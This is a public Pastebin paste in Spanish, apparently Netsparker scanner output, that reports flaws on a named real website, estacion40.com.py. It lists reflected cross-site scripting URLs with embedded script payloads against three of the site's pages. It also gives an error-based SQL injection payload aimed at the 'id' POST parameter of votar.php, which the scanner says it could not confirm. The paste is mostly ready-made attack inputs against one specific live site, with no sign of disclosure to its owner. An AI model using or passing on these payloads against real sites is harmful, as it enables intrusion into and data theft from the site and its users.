Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ---------------------------------------------->
- Reporte
- -------------------------------------------------------------------------------------------->
- (ERRORES)
- ---------------------------------------------->
- [email protected] > message
- Cross Scripting
- http://www.estacion40.com.py/entrar.php/%22ns=%22YeiZeta(0x000051)%22%3E%3Cscript%3Ealert(9)%3C/script%3E
- http://www.estacion40.com.py/blog-interno.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001FB)%3C/script%3E
- http://www.estacion40.com.py/form-registro.php/%22ns=%22Yei Zeta(0x000303)%22%3E%3Cscript%3Ealert(9)%3C/script%3E
- Cookie
- http://www.estacion40.com.py/entrar.php
- Pro:
- Url http://www.estacion40.com.py/votar.php
- Parameter Name id
- Parameter Type Post
- Attack Pattern (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Descripción:
- Inyección de SQL se produce cuando la entrada de datos, por ejemplo, por un usuario se interpreta como un comando SQL en lugar de los datos normales de la base de datos back-end. Esta es una vulnerabilidad muy común y su explotación exitosa puede tener implicaciones importantes. Aunque Netsparker cree que hay una inyección SQL aquí no podría confirmarlo. Puede haber muchas razones para Netsparker no poder confirmarlo. Le recomendamos investigar el problema de forma manual para asegurar que se trata de una inyección SQL, y que debe ser abordado. También puede considerar el envío de los detalles de este tema para nosotros, para que podamos tratar este tema para la próxima vez y le dará un resultado más preciso.
Advertisement
Add Comment
Please, Sign In to add comment